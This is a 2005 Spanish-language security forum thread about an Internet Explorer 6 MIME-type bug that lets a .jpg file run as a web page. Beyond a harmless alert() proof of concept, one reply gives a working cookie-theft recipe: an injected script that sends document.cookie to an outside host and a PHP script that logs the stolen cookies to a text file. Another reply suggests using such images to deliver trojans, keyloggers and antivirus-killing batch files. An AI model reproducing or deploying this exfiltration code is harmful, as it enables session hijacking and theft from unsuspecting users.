elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 06:54  


Tema destacado: Grupo de Facebook de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Bug de Windows en la cabecera MIME!!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Bug de Windows en la cabecera MIME!!!  (Leído 1,875 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Bug de Windows en la cabecera MIME!!!
« en: 16 Agosto 2005, 19:34 »

La vulnerabilidad afecta al Internet Explorer 6 y anteriores.

El Internet Explorer ha sido diseñado de manera que identifica los tipos de archivo mediante las cabeceras MIME, omitiendo la extensión del archivo. Esto permite que archivos con, por ejemplo, extensión .jpg no sean procesados como imágenes si el MIME del archivo es diferente del jpg.
Esto permite a un atacante crear un archivo con contenido ejecutable y extensión .jpg y crear un link que apunte al archivo jpg.
Cuando una víctima accede al link malicioso con el Internet Explorer, éste ejecutará el contenido del archivo creado por el atacante aunque la víctima piense que nada extraño ha sucedido.
Para reproducir el fallo simplemente hay que crear un archivo con extensión .jpg con, por ejemplo, este código:

Código:
<img src=http://www.xxx.com/xxx/xx/images/experiences/hls_ie55.gif>
<script>
alert('El código javascript se ha ejecutado')
</script>

una prueba de concepto en este link para saber si tu browser es vulnerable:

http://ciberia.ya.com/webmousehack/prueba.gif

fuente: cyruxnet

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
TigreDARK


Desconectado Desconectado

Mensajes: 369



Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #1 en: 17 Agosto 2005, 11:32 »

La vulnerabilidad afecta al Internet Explorer 6 y anteriores.

El Internet Explorer ha sido diseñado de manera que identifica los tipos de archivo mediante las cabeceras MIME, omitiendo la extensión del archivo. Esto permite que archivos con, por ejemplo, extensión .jpg no sean procesados como imágenes si el MIME del archivo es diferente del jpg.
Esto permite a un atacante crear un archivo con contenido ejecutable y extensión .jpg y crear un link que apunte al archivo jpg.
Cuando una víctima accede al link malicioso con el Internet Explorer, éste ejecutará el contenido del archivo creado por el atacante aunque la víctima piense que nada extraño ha sucedido.
Para reproducir el fallo simplemente hay que crear un archivo con extensión .jpg con, por ejemplo, este código:

Código:
<img src=http://www.xxx.com/xxx/xx/images/experiences/hls_ie55.gif>
<script>
alert('El código javascript se ha ejecutado')
</script>

una prueba de concepto en este link para saber si tu browser es vulnerable:

http://ciberia.ya.com/webmousehack/prueba.gif

fuente: cyruxnet

Salu2
HOLA MOUSE :)
hablo de INEXPERTO TOTAL jaja!
Que otras cosas se pueden ejecutar? no se que haga que se baje un virus? netcat por ejemplo? o algo... haciendo un tftp get? digo... no se...alguna idea realizable? aparte del mensajito en java? :)
Gracias! 8)
En línea

mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #2 en: 17 Agosto 2005, 15:53 »

hola Tigre ;)

podrias hechar a volar tu imaginacion...XD, por ejemplo mucho se hablo en este foro de camuflar los servers de los troyanos en imagenes, a lo que previamente le podrias agregar un archivo bat que mate los procesos del antivirus de manera se que se descargue del link infectado...etc...nose...solo es una idea,un virus, un keylooger, etc, si yo pude ejecutar un mensaje en tu browser, imaginate un archivo, supuestamente con extension .gif que te direccione a mi server y descargue en tu PC algo sin avisarte nada, mientras tu disfrutas de la imagen que yo puse...alguna utilidad se le puede dar no crees???
es cuestion de probar...XDDDD ;)

Salu2 y que la fuerza de JAVA te acompañe...XD
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #3 en: 18 Agosto 2005, 02:51 »

Depede mucho de la configuración de IE, por ejemplo a mí al utilizar control FSO, ActiveX me lo paraliza quedando el código totalmente inutilizable, puesto que esa es una de las principales funciones para manejar archivos.
En línea
CdbRwS

Desconectado Desconectado

Mensajes: 183


[ Made In San Luis ]


Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #4 en: 18 Agosto 2005, 06:06 »

es parecido al atake xxs que se producia en hotmail xD..

o sea Viejo.. pero sirve igual..


pido ayuda a cualkiera de uds por que tengo una vulnerabilidad DOS en el internet explorer y necesito reportarla y como es la primera vez que la voy a reportar! no se como hacerlo asi que por favor que alguno se contacte conmigo gracias! ;)
En línea


[ C d b R w S ]
TigreDARK


Desconectado Desconectado

Mensajes: 369



Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #5 en: 19 Agosto 2005, 12:11 »

hola Tigre ;)
Hola MOuse! che leiste el mensaje privado que te mande???? :)
Bye!  8)
En línea

mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #6 en: 19 Agosto 2005, 19:47 »

Citar
Hola MOuse! che leiste el mensaje privado que te mande?

Si lo lei ;) y pasame tu MSN asi te agregue

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Death_Soul

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #7 en: 19 Agosto 2005, 22:44 »

Bueno no me ha quedado muy claro como explotar la vulnerabilidad. Si me pudieras echar una mano. ::)
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #8 en: 19 Agosto 2005, 23:17 »

voy a postear, a titulo de ejemplo, como se podria hacer para realizar el robo de coockie`s aprovechando este bug.

primero nos vamos al block de notas y colocamos lo siguiente:

Código:
<img src="http://www.xxx.com/imagen.jpg"> ->un link a una imagen.jpg cualkiera


<script>document.location='http://www.tuweb.com/z.php?z='+document.cookie;</script> ->Este es el alma del bug, esto hara que envie la informacion de la cookie al archivo z.php

Después solo guardamos el archivo como foto.jpg(x ejemplo)
Bien ahora creamos el archivo z.php que sera el encargado de recoger la cookie y guardarla en un .txt

 Otra vez abrimos el bloc de notas y escribimos el siguiente codigo:

Código:
<?
if(isset($_GET["z"]))
{
$referer = $_SERVER["HTTP_REFERER"];
$file = fopen("robo.txt", "a");
fwrite($file, $_GET["z"]."  ".$referer."\n");
fclose($file);
}
?>

 
Este codigo recogera la cookie que viene como z y la guardara en un .txt de nombre robo.Guardamos el archivo como z.php y subimos todos los archivos que hemos creado a nuestra host
Ahora ya solo nos queda entrar a http://www.tuweb.com/foto.jpg (o el nombre que le pusieramos al jpg) y ver el .txt 

 Vemos que nos redireccionara y en el browser saldra la info en hex ,para eso se puede usar iframe con 0 border y no scrollbar....asi se vera la imagen only....

PD:graxias a alexhk_23 del foro hackyashira (del cual tambien participo y recomiendo,...Sorry por el spam..XD) espero q este hilo continue, y se posteen nuevas formas de aprovechar este bug, que es recurrente... ;)

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
NewLog


Desconectado Desconectado

Mensajes: 327



Ver Perfil WWW
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #9 en: 20 Agosto 2005, 00:58 »

Lo que es recurrente es tu firma xDD

Para poder explotar este bug como dios manda, TigreDARK es cuestión de saber bastante java  ::)
En línea
CdbRwS

Desconectado Desconectado

Mensajes: 183


[ Made In San Luis ]


Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #10 en: 20 Agosto 2005, 22:19 »

Citar
pido ayuda a cualkiera de uds por que tengo una vulnerabilidad DOS en el internet explorer y necesito reportarla y como es la primera vez que la voy a reportar! no se como hacerlo asi que por favor que alguno se contacte conmigo gracias!
En línea


[ C d b R w S ]
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #11 en: 23 Agosto 2005, 20:28 »

mousehack, al hacer eso estas robando la propia cookie de tuweb.com, que generalmente es inexistente, puesto que no la has creado.
En línea
txomin

Desconectado Desconectado

Mensajes: 62



Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #12 en: 24 Agosto 2005, 02:37 »

realmente esto no es un exploit peligroso en si mismo, q no puede acer nada malo solo, simplemente q una foto se comporte como web, pero claro, una web no puede acer nada sin otro exploit.
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #13 en: 24 Agosto 2005, 11:53 »

realmente esto no es un exploit peligroso en si mismo, q no puede acer nada malo solo, simplemente q una foto se comporte como web, pero claro, una web no puede acer nada sin otro exploit.

Supongo que la peligrosidad varia según el tipo de configuración de IE de cada uno.
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Bug de Windows en la cabecera MIME!!!
« Respuesta #14 en: 15 Septiembre 2005, 07:11 »

ya que va al tema.. masomenos
una duda.
el messenger 6.2 lo actualizaron todos voluntariamente afuersas por una vuln. en imagenes, que podian ejecutar codigo malicioso.

ahora, esa vulnerabilidad segun lei era para archivos con extensiones PNG y GIF.

como funcionaba?

digo ahora nadie tiene el messenger vulnerable, pero aprender no cuesta nada..

Gracias
Saludos!!
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
MIME identificar archivos por su contenido
Programación Visual Basic
AbrahamAraon 2 351 Último mensaje 23 Septiembre 2011, 03:14
por raul338
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines